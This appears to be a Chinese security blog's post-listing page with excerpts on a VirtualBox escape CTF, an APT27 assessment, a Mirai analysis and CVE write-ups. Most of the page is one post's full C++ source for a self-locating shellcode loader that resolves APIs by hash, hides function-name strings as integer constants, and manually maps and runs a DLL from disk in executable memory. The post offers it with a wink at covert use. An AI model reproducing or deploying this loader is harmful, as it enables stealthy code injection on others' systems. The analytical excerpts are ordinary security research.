二进制安全渗透复现汇编Shellcode [2021]VirtualBox 6.1.16有限逃逸漏洞 这篇文章是关于最新可用版本(Windows上为VirtualBox 6.1.16)的VirtualBox转义。我们的团队Sauercl0ud发现并利用了这些漏洞,这是RealWorld CTF 2020/2021的一部分。 该漏洞是组织者已知的,要求来宾能够插入内核模块,并且在VirtualBox的默认配置上无法利用,因此影响非常有限。 非常感谢组织者举办这场伟大的比赛,特别是感谢ChenNan提出这一挑战,感谢M4x一直很乐于助人,回答了我们的问题,并通过许多演示尝试与我们坐在一起,当然还有参与编写漏洞利用程序的所有人员。 让我们来看看:D 阅读全文 2021-01-24 huoji 0 条评论
二进制安全游戏安全渗透复现汇编Shellcode [2020]自定位+内存加载shellcode 可用于驱动+R3通用 用来干什么懂的都懂 ```cpp #define HUOJI_POOL_TAG 'huoJ' #define CALCSIZE(n,f) (ULONG_PTR)f - (ULONG_PTR)n #define PAGE_ALIGN(Va) ((PVOID)((ULONG_PTR)(Va) & ~(PAGE_SIZE - 1))) typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); typedef FARPROC(WINAPI* GETPROCADDRESS)(HMODULE, LPCSTR); typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); typedef DWORD(NTAPI* NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG); typedef BOOL(WINAPI* ReadFileT)(HANDLE, LPVOID, DWORD, LPDWORD, PVOID); typedef HANDLE(WINAPI* CreateFileAT)(LPCSTR, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE); typedef DWORD(WINAPI* GetFileSizeT)(HANDLE, LPDWORD); typedef BOOL(WINAPI* CloseHandleT)(HANDLE); #define KERNEL32DLL_HASH 0x6A4ABC5B #define NTDLLDLL_HASH 0x3CFA685D #define LOADLIBRARYA_HASH 0xEC0E4E8E #define GETPROCADDRESS_HASH 0x7C0DFCAA #define VIRTUALALLOC_HASH 0x91AFCA54 #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 #define HASH_KEY 13 #define DLL_PROCESS_ATTACH 1 #define DLL_THREAD_ATTACH 2 #define DLL_THREAD_DETACH 3 #define DLL_PROCESS_DETACH 0 typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID); #ifndef PXE_BASE #define PXE_BASE 0xFFFFF6FB7DBED000UI64 #endif #ifndef PXE_SELFMAP #define PXE_SELFMAP 0xFFFFF6FB7DBEDF68UI64 #endif #ifndef PPE_BASE #define PPE_BASE 0xFFFFF6FB7DA00000UI64 #endif #ifndef PDE_BASE #define PDE_BASE 0xFFFFF6FB40000000UI64 #endif #ifndef PTE_BASE #define PTE_BASE 0xFFFFF68000000000UI64 #endif typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImages; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; union { LIST_ENTRY HashLinks; struct { PVOID SectionPointer; ULONG CheckSum; }; }; union { struct { ULONG TimeDateStamp; }; struct { PVOID LoadedImports; }; }; }LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; typedef struct { WORD offset : 12; WORD type : 4; } IMAGE_RELOC, * PIMAGE_RELOC; VOID WINAPI RemoteLoadStart() { LOADLIBRARYA pLoadLibraryA = NULL; GETPROCADDRESS pGetProcAddress = NULL; VIRTUALALLOC pVirtualAlloc = NULL; NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; ReadFileT pReadFile = NULL; CreateFileAT pCreateFile = NULL; GetFileSizeT pGetFileSize = NULL; CloseHandleT pCloseHandle = NULL; USHORT usCounter; ULONG_PTR uiBaseAddress; ULONG_PTR uiAddressArray; ULONG_PTR uiNameArray; ULONG_PTR uiExportDir; ULONG_PTR uiNameOrdinals; DWORD dwHashValue; ULONG_PTR uiHeaderValue; ULONG_PTR uiValueA; ULONG_PTR uiValueB; ULONG_PTR uiValueC; ULONG_PTR uiValueD; ULONG_PTR uiValueE; uiBaseAddress = __readgsqword(0x60); uiBaseAddress = *(PDWORD64)((PUCHAR)uiBaseAddress + 0x18); uiValueA = (ULONG_PTR)(*(PLIST_ENTRY)((PUCHAR)uiBaseAddress + 0x10)).Flink; ULONG_PTR Kernel32Base, NTDllBase; while (uiValueA) { uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Buffer; usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; uiValueC = 0; do { uiValueC = _rotr((DWORD)uiValueC, HASH_KEY); if (*((BYTE*)uiValueB) >= 'a') uiValueC += *((BYTE*)uiValueB) - 0x20; else uiValueC += *((BYTE*)uiValueB); uiValueB++; } while (--usCounter); if ((DWORD)uiValueC == KERNEL32DLL_HASH) { uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; Kernel32Base = uiBaseAddress; uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); usCounter = 3; while (usCounter > 0) { char* c = (char*)(uiBaseAddress + DEREF_32(uiNameArray)); register DWORD h = 0; do { h = _rotr(h, HASH_KEY); h += *c; } while (*++c); dwHashValue = h; if (dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH) { uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); if (dwHashValue == LOADLIBRARYA_HASH) pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray)); else if (dwHashValue == GETPROCADDRESS_HASH) pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray)); else if (dwHashValue == VIRTUALALLOC_HASH) pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray)); usCounter--; } uiNameArray += sizeof(DWORD); uiNameOrdinals += sizeof(WORD); } } else if ((DWORD)uiValueC == NTDLLDLL_HASH) { uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; NTDllBase = uiBaseAddress; uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); usCounter = 1; while (usCounter > 0) { char* c = (char*)(uiBaseAddress + DEREF_32(uiNameArray)); register DWORD h = 0; do { h = _rotr(h, HASH_KEY); h += *c; } while (*++c); dwHashValue = h; if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) { uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray)); usCounter--; } uiNameArray += sizeof(DWORD); uiNameOrdinals += sizeof(WORD); } } if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache) break; uiValueA = DEREF(uiValueA); } /* 加载shellcode */ PVOID dwStrings = pVirtualAlloc(NULL, 12, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x64616552; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x656c6946; pReadFile = (ReadFileT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x61657243; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x69466574; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x41656c; pCreateFile = (CreateFileAT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x46746547; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x53656c69; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x657a69; pGetFileSize = (GetFileSizeT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x736f6c43; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x6e614865; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x656c64; pCloseHandle = (CloseHandleT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); /* C:\\test.dll 433a2f74 6573742e 646c6c change your self */ *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x742f3a43; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x2e747365; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x6c6c64; HANDLE hFile = pCreateFile((LPCSTR)dwStrings, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, 3, 0, NULL); DWORD mSize = pGetFileSize(hFile, NULL); ULONG_PTR uiLibraryAddress = (ULONG_PTR)pVirtualAlloc(NULL, mSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pReadFile(hFile, (LPVOID)uiLibraryAddress, mSize, NULL, NULL); pCloseHandle(hFile); uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; uiValueB = uiLibraryAddress; uiValueC = uiBaseAddress; while (uiValueA--) *(BYTE*)uiValueC++ = *(BYTE*)uiValueB++; uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader); uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; while (uiValueE--) { uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress); uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData); uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; while (uiValueD--) *(BYTE*)uiValueB++ = *(BYTE*)uiValueC++; uiValueA += sizeof(IMAGE_SECTION_HEADER); } uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name) { uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk); uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk); while (DEREF(uiValueA)) { if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG) { uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD)); DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray)); } else { uiValueB = (uiBaseAddress + DEREF(uiValueA)); DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); } uiValueA += sizeof(ULONG_PTR); if (uiValueD) uiValueD += sizeof(ULONG_PTR); } uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); } uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) { uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock) { uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress); uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC); uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); while (uiValueB--) { if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64) *(ULONG_PTR*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW) *(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH) *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW) *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); uiValueD += sizeof(IMAGE_RELOC); } uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; } } uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint); pNtFlushInstructionCache((HANDLE)-1, NULL, 0); ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL); } int RemoteLoadEnd() { return 0x77132; } ``` 阅读全文 2020-12-27 huoji 0 条评论
phppython渗透案例web安全javaJavaScript二进制安全无线安全csshtml游戏安全C/C++渗透复现一线开发易语言汇编Shellcode 《网络安全从浅入深百科全书》信息篇 word版本 ## 注意:下面的文字版主要目的是SEO 排版并不好看 建议看word版本: word版本(推荐阅读): [《网络安全从浅入深百科全书》信息篇.docx](https://key08.com/usr/uploads/2020/12/4020023684.docx) word在线阅读,无需下载连接直接接阅读: https://docs.qq.com/doc/DWndvTUh5YUp4UGV2?pub=1&dver=2.1.0 文字版: 主要为seo 排版并不好看: 阅读全文 2020-12-21 huoji 0 条评论
二进制安全渗透复现C/C++易语言 [2020]CVE-2018-8897 原理深度漫游、漏洞利用、调试实战 [CVE-2018-8897 原理深度漫游、漏洞利用、调试实战.pdf](https://key08.com/usr/uploads/2020/12/374400346.pdf) 阅读全文 2020-12-09 huoji 0 条评论
web安全渗透复现 [2018]LuckyMouse APT攻击行动评估 1) LuckyMouse行动是一项针对中亚国家数据中心的持续活动,这意味着攻击者获得了广泛的政府相关的资源。 2) LuckyMouse黑客组织也被称为Iron Tiger、EmissaryPanda或者APT27,今年早些时候也被发现使用比特币挖矿软件对亚洲多个国家实施网络攻击。该组织从2010年开始活跃, 之前从美国的国防项目承包商中窃取了大量数据 Symptoms 相关样本信息: 22CBE2B0F1EF3F2B18B4C5AED6D7BB79 0D0320878946A73749111E6C94BF1525 ac337bd5f6f18b8fe009e45d65a2b09b 04dece2662f648f619d9c0377a7ba7c0 最小闭合的攻击样本: 初始的感染向量未知,预估100k dropper:22cbe2b0f1ef3f2b18b4c5aed6d7bb79,size = 123521 backdoor:04dece2662f648f619d9c0377a7ba7c0 ,size = 81920 攻击能力计算: K = 2 (正常安全认知范围) a = 3 (无交互) s = 1 (鱼叉式钓鱼攻击或水坑攻击) m = 4 (代码注入,特种木马,特殊持久化隐藏,特定目标感染) p = 1 (攻击1种平台,windows) x = 2+2 (使用Nday漏洞,CVE-2017-118822,web入侵方式) 攻击能力 = (a+s+m+p)^(k) * (1+x)^ 2 + c AT = (3 + 1 + 4 + 1) ^ 2 * (1+2+2) ^ 2 + (123521+81920)/1024 + 100 = 9^2 * (5^2)+ 300 = 2025+300 = 2325 ==>2325*1000/1279625(1T攻击力单位) =1.816T 参考引用: 1.https://securelist.com/luckymouse-hits-national-data-center/86083/ 2.https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/ 3.http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states 4.《论高级威胁的本质及攻击能力的量化研究》- www.vxjump.net/files/aptr/aptr.txt 阅读全文 2020-09-27 huoji 0 条评论
二进制安全渗透复现Shellcode [2015]CVE-2015-2387ATMFD分析 就是那个大名鼎鼎的hacking team泄露的内核提权0day [stuxnet_about2_3.pdf](https://key08.com/usr/uploads/2020/08/3986559131.pdf) 阅读全文 2020-08-18 huoji 0 条评论
渗透案例二进制安全渗透复现Shellcode [2019]两起僵尸网络Mirai样本分析 [TOC] ###概述 2019年6月26日蜜罐系统监控到两起Mirai的物联网蠕虫活动情况,自2017年11月23日Check Point研究人员发现华为家用路由器HG532存在0day漏洞(CVE-2017-17215),可以远程执行任意代码,Mirai蠕虫病毒就利用该漏洞进行大肆传播,本文会结合蜜罐捕获的攻击证据对该蠕虫进行技术分析,重点分析该蠕虫是如何利用该漏洞进行传播的。整个攻击流程如下 阅读全文 2019-12-24 夜里猛 0 条评论
